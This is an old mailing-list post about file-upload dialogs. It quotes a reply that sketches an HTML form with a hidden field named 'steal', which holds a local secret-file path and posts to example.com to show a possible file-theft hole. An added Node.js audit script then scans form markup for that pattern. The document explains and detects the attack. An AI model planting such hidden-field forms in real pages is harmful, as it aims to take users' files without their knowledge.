Posted by Jay Blanchard on 01/19/06 15:35
[snip]
> Along these same lines, does anyone know how to make the file dialog start
> in a specific directory? I saw this the other day but forgot where. I
> clicked browse and the dialog popped up pointed to My Pictures (which at
> least works for most Windblows users). I meant to look at the code, but
> didn't....
Yikes!
If it *DOES* work, you've probably got yet another security problem in
Windows.
Suppose, for example, that I do something like this:
<form action="http://example.com/" method="post"
enctype="multipart/form-data">
<input style="visibility: hidden" name="steal"
value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret">
What's your name? <input name="name"><br />
Who's your daddy? <input name="daddy"><br />
<input type="submit">
</form>
Now, the unsuspecting user will be HANDING me the file I shouldn't
have without ever seeing anything about it.
Even if it "only" lets you pick the directory, but not the file, it
probably exposes too much information about my desktop for my tastes.
[/snip]
Now I need to go back and find it. It was a site having to do with photos,
but I was doing research and visited a lot of them. Since the upload dialog
was looking for photos you can see where the apparent convenience could come
in. But you're right....as a security hole it is big enough for aircraft
carrier usage.
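
An added example, not part of the original thread: a small Node.js audit that scans form markup for the pattern shown in the quoted reply, an input the user cannot see that names a local file. The function names, the path heuristic and the extra `photo` field in the sample are assumptions made for illustration.

```javascript
// Added example: static audit of form markup. Regex tag scan, not a full HTML parser.
const LOCAL_PATH = /^(?:[A-Za-z]:\\|\\\\|~\/|\/(?:etc|home|Users|var)\/)/; // heuristic (assumption)
const HIDDEN_CSS = /visibility\s*:\s*hidden|display\s*:\s*none/i;

// Parse one <input ...> tag into a map of lower-cased attribute names to values.
function parseAttrs(tag) {
  const attrs = {};
  const body = tag.replace(/^<input/i, '').replace(/\/?>$/, '');
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Return one finding per <input> that names a file without the user seeing it.
function auditInputs(html) {
  const findings = [];
  for (const [tag] of html.matchAll(/<input\b[^>]*>/gi)) {
    const a = parseAttrs(tag);
    const type = (a.type || 'text').toLowerCase();
    const hidden = type === 'hidden' || 'hidden' in a || HIDDEN_CSS.test(a.style || '');
    const reasons = [];
    if (type === 'file' && a.value) reasons.push('file input with preset value');
    if (type === 'file' && hidden) reasons.push('file input hidden from the user');
    if (hidden && LOCAL_PATH.test(a.value || '')) reasons.push('hidden field carrying a local file path');
    if (reasons.length) findings.push({ name: a.name || '(unnamed)', reasons });
  }
  return findings;
}

// Constructed sample: the form from the quoted reply plus an ordinary, visible upload field.
const SAMPLE = [
  '<form action="http://example.com/" method="post" enctype="multipart/form-data">',
  '<input style="visibility: hidden" name="steal"',
  'value="C:\\path\\to\\commonly\\used\\secret\\file\\I\\should\\not\\get.secret">',
  'What\'s your name? <input name="name"><br />',
  '<input type="file" name="photo">',
  '<input type="submit">',
  '</form>',
].join('\n');

console.log(JSON.stringify(auditInputs(SAMPLE), null, 2));
```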